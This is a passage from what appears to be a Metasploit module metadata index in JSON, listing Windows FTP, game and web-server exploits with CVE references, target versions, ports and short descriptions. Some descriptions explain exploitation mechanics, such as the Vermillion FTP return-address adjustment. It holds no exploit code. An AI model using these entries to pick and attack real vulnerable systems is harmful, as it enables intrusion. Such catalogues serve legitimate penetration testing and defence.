"jduck <jduck@metasploit.com>"
],
"description": "This module exploits an out-of-bounds array access in the Arcane Software\n Vermillion FTP server. By sending a specially crafted FTP PORT command,\n an attacker can corrupt stack memory and execute arbitrary code.\n\n This particular issue is caused by processing data bound by attacker\n controlled input while writing into a 4 byte stack buffer. Unfortunately,\n the writing that occurs is not a simple byte copy.\n\n Processing is done using a source ptr (p) and a destination pointer (q).\n The vulnerable function walks the input string and continues while the\n source byte is non-null. If a comma is encountered, the function increments\n the destination pointer. If an ascii digit [0-9] is encountered, the\n following occurs:\n\n *q = (*q * 10) + (*p - '0');\n\n All other input characters are ignored in this loop.\n\n As a consequence, an attacker must craft input such that modifications\n to the current values on the stack result in usable values. In this exploit,\n the low two bytes of the return address are adjusted to point at the\n location of a 'call edi' instruction within the binary. This was chosen\n since 'edi' points at the source buffer when the function returns.\n\n NOTE: This server can be installed as a service using \"vftpd.exe install\".\n If so, the service does not restart automatically, giving an attacker only\n one attempt.",
"references": [
"OSVDB-62163",
"EDB-11293"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic Targeting",
"vftpd 1.31 - Windows XP SP3 English"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/ftp/vermillion_ftpd_port.rb",
"is_install_path": true,
"ref_name": "windows/ftp/vermillion_ftpd_port",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/warftpd_165_pass": {
"name": "War-FTPD 1.65 Password Overflow",
"full_name": "exploit/windows/ftp/warftpd_165_pass",
"rank": 200,
"disclosure_date": "1998-03-19",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This exploits the buffer overflow found in the PASS command\n in War-FTPD 1.65. This particular module will only work\n reliably against Windows 2000 targets. The server must be\n configured to allow anonymous logins for this exploit to\n succeed. A failed attempt will bring down the service\n completely.",
"references": [
"CVE-1999-0256",
"OSVDB-875",
"BID-10078"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows 2000"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/warftpd_165_pass.rb",
"is_install_path": true,
"ref_name": "windows/ftp/warftpd_165_pass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/warftpd_165_user": {
"name": "War-FTPD 1.65 Username Overflow",
"full_name": "exploit/windows/ftp/warftpd_165_user",
"rank": 200,
"disclosure_date": "1998-03-19",
"type": "exploit",
"author": [
"Fairuzan Roslan <riaf@mysec.org>"
],
"description": "This module exploits a buffer overflow found in the USER command\n of War-FTPD 1.65.",
"references": [
"CVE-1999-0256",
"OSVDB-875",
"BID-10078"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic",
"Windows 2000 SP0-SP4 English",
"Windows XP SP0-SP1 English",
"Windows XP SP2 English",
"Windows XP SP3 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/warftpd_165_user.rb",
"is_install_path": true,
"ref_name": "windows/ftp/warftpd_165_user",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/wftpd_size": {
"name": "Texas Imperial Software WFTPD 3.23 SIZE Overflow",
"full_name": "exploit/windows/ftp/wftpd_size",
"rank": 200,
"disclosure_date": "2006-08-23",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in the SIZE verb in\n Texas Imperial's Software WFTPD 3.23.",
"references": [
"CVE-2006-4318",
"OSVDB-28134",
"BID-19617"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows 2000 Pro SP4 English",
"Windows XP Pro SP1 English",
"Windows XP Pro SP2 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/wftpd_size.rb",
"is_install_path": true,
"ref_name": "windows/ftp/wftpd_size",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/winaxe_server_ready": {
"name": "WinaXe 7.7 FTP Client Remote Buffer Overflow",
"full_name": "exploit/windows/ftp/winaxe_server_ready",
"rank": 400,
"disclosure_date": "2016-11-03",
"type": "exploit",
"author": [
"Chris Higgins",
"hyp3rlix"
],
"description": "This module exploits a buffer overflow in the WinaXe 7.7 FTP client.\n This issue is triggered when a client connects to the server and is\n expecting the Server Ready response.",
"references": [
"EDB-40693",
"URL-http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/winaxe_server_ready.rb",
"is_install_path": true,
"ref_name": "windows/ftp/winaxe_server_ready",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/wing_ftp_admin_exec": {
"name": "Wing FTP Server Authenticated Command Execution",
"full_name": "exploit/windows/ftp/wing_ftp_admin_exec",
"rank": 600,
"disclosure_date": "2014-06-19",
"type": "exploit",
"author": [
"Nicholas Nam <nick@executionflow.org>",
"Imran E. Dawoodjee <imrandawoodjee.infosec@gmail.com>"
],
"description": "This module exploits the embedded Lua interpreter in the admin web interface for\n versions 3.0.0 and above. When supplying a specially crafted HTTP POST request\n an attacker can use os.execute() to execute arbitrary system commands on\n the target with SYSTEM privileges.",
"references": [
"URL-http://www.wftpserver.com",
"URL-https://www.wftpserver.com/help/ftpserver/index.html?administrator_console.htm"
],
"platform": "Windows",
"arch": "x86",
"rport": 5466,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Wing FTP Server >= 3.0.0"
],
"mod_time": "2019-02-10 14:26:13 +0000",
"path": "/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb",
"is_install_path": true,
"ref_name": "windows/ftp/wing_ftp_admin_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/wsftp_server_503_mkd": {
"name": "WS-FTP Server 5.03 MKD Overflow",
"full_name": "exploit/windows/ftp/wsftp_server_503_mkd",
"rank": 500,
"disclosure_date": "2004-11-29",
"type": "exploit",
"author": [
"et <et@metasploit.com>",
"Reed Arvin <reedarvin@gmail.com>"
],
"description": "This module exploits the buffer overflow found in the MKD\n command in IPSWITCH WS_FTP Server 5.03 discovered by Reed\n Arvin.",
"references": [
"CVE-2004-1135",
"OSVDB-12509",
"BID-11772"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"WS-FTP Server 5.03 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb",
"is_install_path": true,
"ref_name": "windows/ftp/wsftp_server_503_mkd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/wsftp_server_505_xmd5": {
"name": "Ipswitch WS_FTP Server 5.05 XMD5 Overflow",
"full_name": "exploit/windows/ftp/wsftp_server_505_xmd5",
"rank": 200,
"disclosure_date": "2006-09-14",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in the XMD5 verb in\n IPSWITCH WS_FTP Server 5.05.",
"references": [
"CVE-2006-4847",
"OSVDB-28939",
"BID-20076"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Windows 2000 Pro SP4 English",
"Windows XP Pro SP0 English",
"Windows XP Pro SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb",
"is_install_path": true,
"ref_name": "windows/ftp/wsftp_server_505_xmd5",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/xftp_client_pwd": {
"name": "Xftp FTP Client 3.0 PWD Remote Buffer Overflow",
"full_name": "exploit/windows/ftp/xftp_client_pwd",
"rank": 300,
"disclosure_date": "2010-04-22",
"type": "exploit",
"author": [
"zombiefx",
"dookie"
],
"description": "This module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered\n through an excessively long PWD message.",
"references": [
"OSVDB-63968",
"EDB-12332"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/xftp_client_pwd.rb",
"is_install_path": true,
"ref_name": "windows/ftp/xftp_client_pwd",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/xlink_client": {
"name": "Xlink FTP Client Buffer Overflow",
"full_name": "exploit/windows/ftp/xlink_client",
"rank": 300,
"disclosure_date": "2009-10-03",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Xlink FTP Client 32\n Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2.\n When an overly long FTP server response is received by a client,\n arbitrary code may be executed.",
"references": [
"CVE-2006-5792",
"OSVDB-33969",
"URL-http://www.xlink.com"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Pro SP3 English",
"Windows 2000 SP4 English"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/ftp/xlink_client.rb",
"is_install_path": true,
"ref_name": "windows/ftp/xlink_client",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ftp/xlink_server": {
"name": "Xlink FTP Server Buffer Overflow",
"full_name": "exploit/windows/ftp/xlink_server",
"rank": 400,
"disclosure_date": "2009-10-03",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Xlink FTP Server\n that comes bundled with Omni-NFS Enterprise 5.2.\n When a overly long FTP request is sent to the server,\n arbitrary code may be executed.",
"references": [
"CVE-2006-5792",
"OSVDB-58646",
"URL-http://www.xlink.com"
],
"platform": "Windows",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Omni-NFS Enterprise V5.2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ftp/xlink_server.rb",
"is_install_path": true,
"ref_name": "windows/ftp/xlink_server",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/games/mohaa_getinfo": {
"name": "Medal of Honor Allied Assault getinfo Stack Buffer Overflow",
"full_name": "exploit/windows/games/mohaa_getinfo",
"rank": 500,
"disclosure_date": "2004-07-17",
"type": "exploit",
"author": [
"Jacopo Cervini"
],
"description": "This module exploits a stack based buffer overflow in the getinfo\n command of Medal Of Honor Allied Assault.",
"references": [
"CVE-2004-0735",
"OSVDB-8061",
"EDB-357",
"BID-10743"
],
"platform": "Windows",
"arch": "",
"rport": 12203,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Medal Of Honor Allied Assault v 1.0 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/games/mohaa_getinfo.rb",
"is_install_path": true,
"ref_name": "windows/games/mohaa_getinfo",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/games/racer_503beta5": {
"name": "Racer v0.5.3 Beta 5 Buffer Overflow",
"full_name": "exploit/windows/games/racer_503beta5",
"rank": 500,
"disclosure_date": "2008-08-10",
"type": "exploit",
"author": [
"Trancek <trancek@yashira.org>"
],
"description": "This module exploits the Racer Car and Racing Simulator game\n versions v0.5.3 beta 5 and earlier. Both the client and server listen\n on UDP port 26000. By sending an overly long buffer we are able to\n execute arbitrary code remotely.",
"references": [
"CVE-2007-4370",
"OSVDB-39601",
"EDB-4283",
"BID-25297"
],
"platform": "Windows",
"arch": "",
"rport": 26000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Fmodex.dll - Universal",
"Win XP SP2 English",
"Win XP SP2 Spanish"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/games/racer_503beta5.rb",
"is_install_path": true,
"ref_name": "windows/games/racer_503beta5",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/games/ut2004_secure": {
"name": "Unreal Tournament 2004 \"secure\" Overflow (Win32)",
"full_name": "exploit/windows/games/ut2004_secure",
"rank": 400,
"disclosure_date": "2004-06-18",
"type": "exploit",
"author": [
"stinko <vinnie@metasploit.com>"
],
"description": "This is an exploit for the GameSpy secure query in\n the Unreal Engine.\n\n This exploit only requires one UDP packet, which can\n be both spoofed and sent to a broadcast address.\n Usually, the GameSpy query server listens on port 7787,\n but you can manually specify the port as well.\n\n The RunServer.sh script will automatically restart the\n server upon a crash, giving us the ability to\n bruteforce the service and exploit it multiple\n times.",
"references": [
"CVE-2004-0608",
"OSVDB-7217",
"BID-10570"
],
"platform": "Windows",
"arch": "",
"rport": 7787,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"UT2004 Build 3186"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/games/ut2004_secure.rb",
"is_install_path": true,
"ref_name": "windows/games/ut2004_secure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/adobe_robohelper_authbypass": {
"name": "Adobe RoboHelp Server 8 Arbitrary File Upload and Execute",
"full_name": "exploit/windows/http/adobe_robohelper_authbypass",
"rank": 600,
"disclosure_date": "2009-09-23",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability which\n allows remote attackers to upload and execute arbitrary code.",
"references": [
"CVE-2009-3068",
"OSVDB-57896",
"URL-http://www.intevydis.com/blog/?p=69",
"ZDI-09-066"
],
"platform": "Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Universal Windows Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/adobe_robohelper_authbypass.rb",
"is_install_path": true,
"ref_name": "windows/http/adobe_robohelper_authbypass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/altn_securitygateway": {
"name": "Alt-N SecurityGateway username Buffer Overflow",
"full_name": "exploit/windows/http/altn_securitygateway",
"rank": 200,
"disclosure_date": "2008-06-02",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "Alt-N SecurityGateway is prone to a buffer overflow condition. This\n is due to insufficient bounds checking on the \"username\"\n parameter. Successful exploitation could result in code\n execution with SYSTEM level privileges.\n\n NOTE: This service doesn't restart, you'll only get one shot. However,\n it often survives a successful exploitation attempt.",
"references": [
"CVE-2008-4193",
"OSVDB-45854",
"BID-29457"
],
"platform": "Windows",
"arch": "",
"rport": 4000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"SecurityGateway 1.0.1 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/altn_securitygateway.rb",
"is_install_path": true,
"ref_name": "windows/http/altn_securitygateway",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/altn_webadmin": {
"name": "Alt-N WebAdmin USER Buffer Overflow",
"full_name": "exploit/windows/http/altn_webadmin",
"rank": 200,
"disclosure_date": "2003-06-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "Alt-N WebAdmin is prone to a buffer overflow condition. This\n is due to insufficient bounds checking on the USER\n parameter. Successful exploitation could result in code\n execution with SYSTEM level privileges.",
"references": [
"CVE-2003-0471",
"OSVDB-2207",
"BID-8024",
"URL-http://www.nessus.org/plugins/index.php?view=single&id=11771"
],
"platform": "Windows",
"arch": "",
"rport": 1000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"WebAdmin 2.0.4 Universal",
"WebAdmin 2.0.3 Universal",
"WebAdmin 2.0.2 Universal",
"WebAdmin 2.0.1 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/altn_webadmin.rb",
"is_install_path": true,
"ref_name": "windows/http/altn_webadmin",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/amlibweb_webquerydll_app": {
"name": "Amlibweb NetOpacs webquery.dll Stack Buffer Overflow",
"full_name": "exploit/windows/http/amlibweb_webquerydll_app",
"rank": 300,
"disclosure_date": "2010-08-03",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in Amlib's Amlibweb\n Library Management System (NetOpacs). The webquery.dll\n API is available through IIS requests. By specifying\n an overly long string to the 'app' parameter, SeH can be\n reliably overwritten allowing for arbitrary remote code execution.\n In addition, it is possible to overwrite EIP by specifying\n an arbitrary parameter name with an '=' terminator.",
"references": [
"OSVDB-66814",
"BID-42293",
"URL-http://www.aushack.com/advisories/"
],
"platform": "Windows",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro All - English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/amlibweb_webquerydll_app.rb",
"is_install_path": true,
"ref_name": "windows/http/amlibweb_webquerydll_app",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/apache_chunked": {
"name": "Apache Win32 Chunked Encoding",
"full_name": "exploit/windows/http/apache_chunked",
"rank": 400,
"disclosure_date": "2002-06-19",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits the chunked transfer integer wrap\n vulnerability in Apache version 1.2.x to 1.3.24. This\n particular module has been tested with all versions of the\n official Win32 build between 1.3.9 and 1.3.24. Additionally,\n it should work against most co-branded and bundled versions\n of Apache (Oracle 8i, 9i, IBM HTTPD, etc).\n\n You will need to use the Check() functionality to determine\n the exact target version prior to launching the exploit. The\n version of Apache bundled with Oracle 8.1.7 will not\n automatically restart, so if you use the wrong target value,\n the server will crash.",
"references": [
"CVE-2002-0392",
"OSVDB-838",
"BID-5033"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Generic Bruteforce",
"Apache.org Build 1.3.9->1.3.19",
"Apache.org Build 1.3.22->1.3.24",
"Apache.org Build 1.3.19->1.3.24",
"Apache.org Build 1.3.22",
"Apache.org Build 1.3.17->1.3.24 (Windows 2000)",
"Apache.org Build 1.3.17->1.3.24 (Windows NT)",
"Windows 2003 English SP0",
"Windows 2000 English",
"Oracle 8.1.7 Apache 1.3.12",
"Oracle 9.1.0 Apache 1.3.12",
"Oracle 9.2.0 Apache 1.3.22",
"Debugging Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/apache_chunked.rb",
"is_install_path": true,
"ref_name": "windows/http/apache_chunked",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/apache_mod_rewrite_ldap": {
"name": "Apache Module mod_rewrite LDAP Protocol Buffer Overflow",
"full_name": "exploit/windows/http/apache_mod_rewrite_ldap",
"rank": 500,
"disclosure_date": "2006-07-28",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits the mod_rewrite LDAP protocol scheme handling\n flaw discovered by Mark Dowd, which produces an off-by-one overflow.\n Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.\n This module requires REWRITEPATH to be set accurately. In addition,\n the target must have 'RewriteEngine on' configured, with a specific\n 'RewriteRule' condition enabled to allow for exploitation.\n\n The flaw affects multiple platforms, however this module currently\n only supports Windows based installations.",
"references": [
"CVE-2006-3747",
"OSVDB-27588",
"BID-19204",
"URL-http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html",
"EDB-3680",
"EDB-3996",
"EDB-2237"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb",
"is_install_path": true,
"ref_name": "windows/http/apache_mod_rewrite_ldap",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/apache_modjk_overflow": {
"name": "Apache mod_jk 1.2.20 Buffer Overflow",
"full_name": "exploit/windows/http/apache_modjk_overflow",
"rank": 500,
"disclosure_date": "2007-03-02",
"type": "exploit",
"author": [
"Nicob <nicob@nicob.net>"
],
"description": "This is a stack buffer overflow exploit for mod_jk 1.2.20.\n Should work on any Win32 OS.",
"references": [
"CVE-2007-0774",
"OSVDB-33855",
"BID-22791",
"ZDI-07-008"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"mod_jk 1.2.20 (Apache 1.3.x/2.0.x/2.2.x) (any win32 OS/language)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/apache_modjk_overflow.rb",
"is_install_path": true,
"ref_name": "windows/http/apache_modjk_overflow",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/avaya_ccr_imageupload_exec": {
"name": "Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution",
"full_name": "exploit/windows/http/avaya_ccr_imageupload_exec",
"rank": 600,
"disclosure_date": "2012-06-28",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability on Avaya IP Office\n Customer Call Reporter, which allows a remote user to upload arbitrary files\n through the ImageUpload.ashx component. It can be abused to upload and execute\n arbitrary ASP .NET code. The vulnerability has been tested successfully on Avaya IP\n Office Customer Call Reporter 7.0.4.2 and 8.0.8.15 on Windows 2003 SP2.",
"references": [
"CVE-2012-3811",
"OSVDB-83399",
"BID-54225",
"URL-https://downloads.avaya.com/css/P8/documents/100164021",
"ZDI-12-106"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Avaya IP Office Customer Call Reporter 7.0 and 8.0 / Microsoft Windows Server 2003 SP2"
],
"mod_time": "2019-01-09 06:32:22 +0000",
"path": "/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb",
"is_install_path": true,
"ref_name": "windows/http/avaya_ccr_imageupload_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/badblue_ext_overflow": {
"name": "BadBlue 2.5 EXT.dll Buffer Overflow",
"full_name": "exploit/windows/http/badblue_ext_overflow",
"rank": 500,
"disclosure_date": "2003-04-20",
"type": "exploit",
"author": [
"acaro <acaro@jervus.it>"
],
"description": "This is a stack buffer overflow exploit for BadBlue version 2.5.",
"references": [
"CVE-2005-0595",
"OSVDB-14238",
"BID-7387"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"BadBlue 2.5 (Universal)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/badblue_ext_overflow.rb",
"is_install_path": true,
"ref_name": "windows/http/badblue_ext_overflow",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/badblue_passthru": {
"name": "BadBlue 2.72b PassThru Buffer Overflow",
"full_name": "exploit/windows/http/badblue_passthru",
"rank": 500,
"disclosure_date": "2007-12-10",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the PassThru\n functionality in ext.dll in BadBlue 2.72b and earlier.",
"references": [
"CVE-2007-6377",
"OSVDB-42416",
"BID-26803"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"BadBlue EE 2.7 Universal",
"BadBlue 2.72b Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/badblue_passthru.rb",
"is_install_path": true,
"ref_name": "windows/http/badblue_passthru",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/bea_weblogic_jsessionid": {
"name": "BEA WebLogic JSESSIONID Cookie Value Overflow",
"full_name": "exploit/windows/http/bea_weblogic_jsessionid",
"rank": 400,
"disclosure_date": "2009-01-13",
"type": "exploit",
"author": [
"pusscat <pusscat@metasploit.com>"
],
"description": "This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable\n code is only accessible when clustering is configured. A request containing a\n long JSESSION cookie value can lead to arbitrary code execution.",
"references": [
"CVE-2008-5457",
"OSVDB-51311"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Apache 2.2 - WebLogic module version 1.0.1136334",
"Windows Apache 2.2 - WebLogic module version 1.0.1150354"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/bea_weblogic_jsessionid.rb",
"is_install_path": true,
"ref_name": "windows/http/bea_weblogic_jsessionid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/bea_weblogic_post_bof": {
"name": "Oracle Weblogic Apache Connector POST Request Buffer Overflow",
"full_name": "exploit/windows/http/bea_weblogic_post_bof",
"rank": 500,
"disclosure_date": "2008-07-17",
"type": "exploit",
"author": [
"KingCope",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack based buffer overflow in the BEA\n Weblogic Apache plugin.\n\n The connector fails to properly handle specially crafted HTTP POST\n requests, resulting a buffer overflow due to the insecure usage\n of sprintf. Currently, this module works over Windows systems without DEP,\n and has been tested with Windows 2000 / XP.\n\n In addition, the Weblogic Apache plugin version is fingerprinted with a POST\n request containing a specially crafted Transfer-Encoding header.",
"references": [
"CVE-2008-3257",
"OSVDB-47096",
"BID-30273"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]",
"BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]",
"BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/bea_weblogic_post_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/bea_weblogic_post_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/bea_weblogic_transfer_encoding": {
"name": "BEA Weblogic Transfer-Encoding Buffer Overflow",
"full_name": "exploit/windows/http/bea_weblogic_transfer_encoding",
"rank": 500,
"disclosure_date": "2008-09-09",
"type": "exploit",
"author": [
"pusscat <pusscat@metasploit.com>"
],
"description": "This module exploits a stack based buffer overflow in the BEA\n Weblogic Apache plugin. This vulnerability exists in the\n error reporting for unknown Transfer-Encoding headers.\n You may have to run this twice due to timing issues with handlers.",
"references": [
"CVE-2008-4008",
"OSVDB-49283"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Apache 2.2 version Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb",
"is_install_path": true,
"ref_name": "windows/http/bea_weblogic_transfer_encoding",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/belkin_bulldog": {
"name": "Belkin Bulldog Plus Web Service Buffer Overflow",
"full_name": "exploit/windows/http/belkin_bulldog",
"rank": 200,
"disclosure_date": "2009-03-08",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Belkin Bulldog Plus\n 4.0.2 build 1219. When sending a specially crafted http request,\n an attacker may be able to execute arbitrary code.",
"references": [
"OSVDB-54395",
"BID-34033",
"EDB-8173"
],
"platform": "Windows",
